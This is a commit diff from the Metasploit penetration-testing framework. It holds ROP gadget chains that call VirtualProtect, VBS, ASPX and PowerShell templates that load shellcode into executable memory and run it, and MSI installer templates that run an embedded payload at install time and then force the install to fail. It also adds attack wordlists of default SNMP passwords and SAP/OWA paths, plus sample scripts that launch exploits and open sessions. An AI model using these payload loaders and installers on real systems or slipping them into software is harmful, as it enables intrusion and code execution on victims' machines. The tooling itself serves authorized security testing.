<gadget offset="0x0002ee15">POP EBP # RETN</gadget> <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget> <gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget> <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget> <gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget> <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@ -33,23 +42,29 @@
</compatibility> </compatibility>
<gadgets base="0x77ba0000"> <gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget> <gadget offset="0x00001114">VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget> <gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget> <gadget value="junk">JUNK</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget> <gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget> <gadget offset="0x00029801">POP EBP # RETN</gadget>
<gadget offset="0x00042265">PUSH ESP # RETN</gadget> <gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget> <gadget value="0x03C0990F">EAX</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget> <gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget> <gadget offset="0x000148d3">POP EBX, RET</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget> <gadget offset="0x000521e0">.data</gadget>
<gadget offset="0x0004ff56">Writable location</gadget> <gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget> <gadget offset="0x0001fc02">POP ECX # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget> <gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00038c04">POP EDI # RETN</gadget>
<gadget value="nop">nop</gadget> <gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0944F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="nop">NOP</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget> <gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets> </gadgets>
</rop> </rop>

4
data/sounds/aiff2wav.rb
View File

@ -1,7 +1,7 @@
#!/usr/bin/env ruby #!/usr/bin/env ruby
Dir.open(".").entries.grep(/.aiff$/).each do |inp| Dir.open(".").entries.grep(/.aiff$/).each do |inp|
out = inp.gsub(".aiff", ".wav") out = inp.gsub(".aiff", ".wav")
system("sox #{inp} #{out}") system("sox #{inp} #{out}")
end end

46
data/sounds/gensounds_mac.rb
View File

@ -1,34 +1,34 @@
sounds = { sounds = {
'num0' => '0', 'num0' => '0',
'num1' => '1', 'num1' => '1',
'num2' => '2', 'num2' => '2',
'num3' => '3', 'num3' => '3',
'num4' => '4', 'num4' => '4',
'num5' => '5', 'num5' => '5',
'num6' => '6', 'num6' => '6',
'num7' => '7', 'num7' => '7',
'num8' => '8', 'num8' => '8',
'num9' => '9', 'num9' => '9',
'closed' => 'closed', 'closed' => 'closed',
'opened' => 'opened', 'opened' => 'opened',
'plugin_load' => 'meta sploit sound plugin has been loaded', 'plugin_load' => 'meta sploit sound plugin has been loaded',
'plugin_unload' => 'sound plugin has been unloaded', 'plugin_unload' => 'sound plugin has been unloaded',
'session' => 'session', 'session' => 'session',
'address' => 'address', 'address' => 'address',
'port' => 'port', 'port' => 'port',
'dot' => 'dot', 'dot' => 'dot',
'session_open_meterpreter' => 'a new meterp reter session has been opened', 'session_open_meterpreter' => 'a new meterp reter session has been opened',
'session_open_shell' => 'a new command shell session has been opened', 'session_open_shell' => 'a new command shell session has been opened',
'session_open_vnc' => 'a new VNC session has been opened' 'session_open_vnc' => 'a new VNC session has been opened'
} }
voice_name = 'Zarvox' voice_name = 'Zarvox'
def create_aiff(voice, file,text) def create_aiff(voice, file,text)
system("say -v #{voice} -o #{file}.aiff #{text}") system("say -v #{voice} -o #{file}.aiff #{text}")
end end
sounds.keys.each do |k| sounds.keys.each do |k|
create_aiff(voice_name, k, sounds[k]) create_aiff(voice_name, k, sounds[k])
end end

13
data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238
View File

@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 26
https://metasploit.com:443
END

13
data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229
View File

@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 30
https://www.metasploit.com:443
END

8
data/templates/scripts/to_exe.vbs.template
View File

@ -1,5 +1,5 @@
Function %{var_func}() Function %{var_func}()
%{var_shellcode} %{var_shellcode} = "%{hex_shellcode}"
Dim %{var_obj} Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject") Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@ -10,9 +10,11 @@ Function %{var_func}()
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2) Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName() %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir}) %{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe" %{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false) Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
%{var_stream}.Write %{var_bytes} For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
%{var_stream}.Close %{var_stream}.Close
Dim %{var_shell} Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell") Set %{var_shell} = CreateObject("Wscript.Shell")

21
data/templates/scripts/to_mem.aspx.template Normal file
View File

@ -0,0 +1,21 @@
<%%@ Page Language="C#" AutoEventWireup="true" %%>
<%%@ Import Namespace="System.IO" %%>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
protected void Page_Load(object sender, EventArgs e)
{
%{shellcode}
IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
IntPtr %{var_threadId} = IntPtr.Zero;
IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
}
</script>

2
data/templates/scripts/to_mem_dotnet.ps1.template
View File

@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
$%{var_compileParams}.GenerateInMemory = $True $%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode}) $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
%{shellcode} [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite) $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return } if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

3
data/templates/src/msi/.gitignore vendored Normal file
View File

@ -0,0 +1,3 @@
*.msi
*.wixobj
*.wixpdb

7
data/templates/src/msi/COMPILING.txt Normal file
View File

@ -0,0 +1,7 @@
Compile using WiX: http://wixtoolset.org
Recompile with a larger buffer file to increase the available
buffer size for larger payloads if required.
candle template_x86_windows.wxs
light template_x86_windows.wixobj

1
data/templates/src/msi/buffer Normal file
View File

File diff suppressed because one or more lines are too long

18
data/templates/src/msi/compile.bat Normal file
View File

@ -0,0 +1,18 @@
@echo off
REM Set PATH to location of your WiX binaries
SET PATH=%PATH%;c:\tools\local\wix38-binaries\
@echo on
candle template_windows.wxs
light template_windows.wixobj
copy template_windows.msi ..\..\template_windows.msi
del template_windows.msi
del template_windows.wixobj
del template_windows.wixpdb
candle template_nouac_windows.wxs
light template_nouac_windows.wixobj
copy template_nouac_windows.msi ..\..\template_nouac_windows.msi
del template_nouac_windows.msi
del template_nouac_windows.wixobj
del template_nouac_windows.wixpdb

38
data/templates/src/msi/template_nouac_windows.wxs Normal file
View File

@ -0,0 +1,38 @@
<?xml version='1.0' encoding='windows-1252'?>
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
<Product Name='Foobar 1.0' Id='*'
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" InstallPrivileges="limited" />
<Media Id='1' />
<Directory Id='TARGETDIR' Name='SourceDir'>
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
<Condition>0</Condition>
</Component>
</Directory>
<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
<Binary Id='Payload' SourceFile='buffer' />
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='yes' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
<Feature Id='Complete' Level='1'>
<ComponentRef Id='MyComponent' />
</Feature>
<!-- Define ALLUSERS with a blank value -->
<Property Id="ALLUSERS" Secure="yes"/>
<InstallExecuteSequence>
<ResolveSource After="CostInitialize" />
<Custom Action="ExecPayload" After="InstallInitialize" />
<Custom Action="FailInstallation" Before="InstallFiles" />
</InstallExecuteSequence>
</Product>
</Wix>

35
data/templates/src/msi/template_windows.wxs Normal file
View File

@ -0,0 +1,35 @@
<?xml version='1.0' encoding='windows-1252'?>
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
<Product Name='Foobar 1.0' Id='*'
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />
<Media Id='1' />
<Directory Id='TARGETDIR' Name='SourceDir'>
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
<Condition>0</Condition>
</Component>
</Directory>
<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
<Binary Id='Payload' SourceFile='buffer' />
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='no' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
<Feature Id='Complete' Level='1'>
<ComponentRef Id='MyComponent' />
</Feature>
<InstallExecuteSequence>
<ResolveSource After="CostInitialize" />
<Custom Action="ExecPayload" After="InstallInitialize" />
<Custom Action="FailInstallation" Before="InstallFiles" />
</InstallExecuteSequence>
</Product>
</Wix>

BIN
data/templates/template_nouac_windows.msi Normal file
View File

Binary file not shown.

BIN
data/templates/template_windows.msi Normal file
View File

Binary file not shown.

1
data/wordlists/http_owa_common.txt
View File

@ -1,5 +1,6 @@
aspnet_client/ aspnet_client/
Autodiscover/ Autodiscover/
exchange/
ecp/ ecp/
EWS/ EWS/
Microsoft-Server-ActiveSync/ Microsoft-Server-ActiveSync/

2
data/wordlists/sap_icm_paths.txt
View File

@ -1,3 +1,4 @@
/AdapterFramework/version/version.jsp
/AdobeDocumentServices/Config /AdobeDocumentServices/Config
/AdobeDocumentServices/Config?wsdl /AdobeDocumentServices/Config?wsdl
/AE/index.jsp /AE/index.jsp
@ -319,6 +320,7 @@
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory /webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
/webdynpro/dispatcher/sap.com/tc~wd~tools /webdynpro/dispatcher/sap.com/tc~wd~tools
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer /webdynpro/dispatcher/sap.com/tc~wd~tools/explorer

1
data/wordlists/snmp_default_pass.txt
View File

@ -92,6 +92,7 @@ root
router router
rw rw
rwa rwa
s!a@m#n$p%c
san-fran san-fran
sanfran sanfran
scotty scotty

22
documentation/samples/framework/dump_module_info.rb
View File

@ -13,22 +13,22 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base' require 'msf/base'
if (ARGV.empty?) if (ARGV.empty?)
puts "Usage: #{File.basename(__FILE__)} module_name" puts "Usage: #{File.basename(__FILE__)} module_name"
exit exit
end end
modname = ARGV.shift modname = ARGV.shift
framework = Msf::Simple::Framework.create framework = Msf::Simple::Framework.create
begin begin
# Create the module instance. # Create the module instance.
mod = framework.modules.create(modname) mod = framework.modules.create(modname)
if not mod if not mod
puts "Error: The specified Msf::Module, \"#{modname}\", was not found." puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
else else
# Dump the module's information in readable text format. # Dump the module's information in readable text format.
puts Msf::Serializer::ReadableText.dump_module(mod) puts Msf::Serializer::ReadableText.dump_module(mod)
end end
rescue rescue
puts "Error: #{$!}\n\n#{$@.join("\n")}" puts "Error: #{$!}\n\n#{$@.join("\n")}"
end end

14
documentation/samples/framework/encode_file.rb
View File

@ -13,18 +13,18 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base' require 'msf/base'
if (ARGV.empty?) if (ARGV.empty?)
puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format" puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
exit exit
end end
framework = Msf::Simple::Framework.create framework = Msf::Simple::Framework.create
begin begin
# Create the encoder instance. # Create the encoder instance.
mod = framework.encoders.create(ARGV.shift) mod = framework.encoders.create(ARGV.shift)
puts(Msf::Simple::Buffer.transform( puts(Msf::Simple::Buffer.transform(
mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby')) mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
rescue rescue
puts "Error: #{$!}\n\n#{$@.join("\n")}" puts "Error: #{$!}\n\n#{$@.join("\n")}"
end end

2
documentation/samples/framework/enumerate_modules.rb
View File

@ -16,5 +16,5 @@ framework = Msf::Simple::Framework.create
# Enumerate each module in the framework. # Enumerate each module in the framework.
framework.modules.each_module { |name, mod| framework.modules.each_module { |name, mod|
puts "#{mod.type}: #{name}" puts "#{mod.type}: #{name}"
} }

40
documentation/samples/framework/run_exploit_using_base.rb
View File

@ -14,8 +14,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base' require 'msf/base'
if (ARGV.length == 0) if (ARGV.length == 0)
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS" puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit exit
end end
framework = Msf::Simple::Framework.create framework = Msf::Simple::Framework.create
@ -25,28 +25,28 @@ input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new output = Rex::Ui::Text::Output::Stdio.new
begin begin
# Initialize the exploit instance # Initialize the exploit instance
exploit = framework.exploits.create(exploit_name) exploit = framework.exploits.create(exploit_name)
# Fire it off. # Fire it off.
session = exploit.exploit_simple( session = exploit.exploit_simple(
'Payload' => payload_name, 'Payload' => payload_name,
'OptionStr' => ARGV.join(' '), 'OptionStr' => ARGV.join(' '),
'LocalInput' => input, 'LocalInput' => input,
'LocalOutput' => output) 'LocalOutput' => output)
# If a session came back, try to interact with it. # If a session came back, try to interact with it.
if (session) if (session)
output.print_status("Session #{session.sid} created, interacting...") output.print_status("Session #{session.sid} created, interacting...")
output.print_line output.print_line
session.init_ui(input, output) session.init_ui(input, output)
session.interact session.interact
else else
output.print_line("Exploit completed, no session was created.") output.print_line("Exploit completed, no session was created.")
end end
rescue rescue
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}") output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
end end

60
documentation/samples/framework/run_exploit_using_core.rb
View File

@ -15,8 +15,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base' require 'msf/base'
if (ARGV.length == 0) if (ARGV.length == 0)
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS" puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit exit
end end
framework = Msf::Simple::Framework.create framework = Msf::Simple::Framework.create
@ -26,43 +26,43 @@ input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new output = Rex::Ui::Text::Output::Stdio.new
begin begin
# Create the exploit driver instance. # Create the exploit driver instance.
driver = Msf::ExploitDriver.new(framework) driver = Msf::ExploitDriver.new(framework)
# Initialize the exploit driver's exploit and payload instance # Initialize the exploit driver's exploit and payload instance
driver.exploit = framework.exploits.create(exploit_name) driver.exploit = framework.exploits.create(exploit_name)
driver.payload = framework.payloads.create(payload_name) driver.payload = framework.payloads.create(payload_name)
# Import options specified in VAR=VAL format from the supplied command # Import options specified in VAR=VAL format from the supplied command
# line. # line.
driver.exploit.datastore.import_options_from_s(ARGV.join(' ')) driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
# Share the exploit's datastore with the payload. # Share the exploit's datastore with the payload.
driver.payload.share_datastore(driver.exploit.datastore) driver.payload.share_datastore(driver.exploit.datastore)
# Initialize the target index to what's in the exploit's data store or # Initialize the target index to what's in the exploit's data store or
# zero by default. # zero by default.
driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
# Initialize the exploit and payload user interfaces. # Initialize the exploit and payload user interfaces.
driver.exploit.init_ui(input, output) driver.exploit.init_ui(input, output)
driver.payload.init_ui(input, output) driver.payload.init_ui(input, output)
# Fire it off. # Fire it off.
session = driver.run session = driver.run
# If a session came back, try to interact with it. # If a session came back, try to interact with it.
if (session) if (session)
output.print_status("Session #{session.sid} created, interacting...") output.print_status("Session #{session.sid} created, interacting...")
output.print_line output.print_line
session.init_ui(input, output) session.init_ui(input, output)
session.interact session.interact
else else
output.print_line("Exploit completed, no session was created.") output.print_line("Exploit completed, no session was created.")
end end
rescue rescue
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}") output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
end end

44
documentation/samples/modules/auxiliary/sample.rb
View File

@ -15,31 +15,31 @@ require 'msf/core'
### ###
class Metasploit4 < Msf::Auxiliary class Metasploit4 < Msf::Auxiliary
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => 'Sample Auxiliary Module', 'Name' => 'Sample Auxiliary Module',
'Description' => 'Sample Auxiliary Module', 'Description' => 'Sample Auxiliary Module',
'Author' => ['hdm'], 'Author' => ['hdm'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' =>
[ [
['Default Action'], ['Default Action'],
['Another Action'] ['Another Action']
] ]
)) ))
end end
def run def run
print_status("Running the simple auxiliary module with action #{action.name}") print_status("Running the simple auxiliary module with action #{action.name}")
end end
def auxiliary_commands def auxiliary_commands
return { "aux_extra_command" => "Run this auxiliary test commmand" } return { "aux_extra_command" => "Run this auxiliary test commmand" }
end end
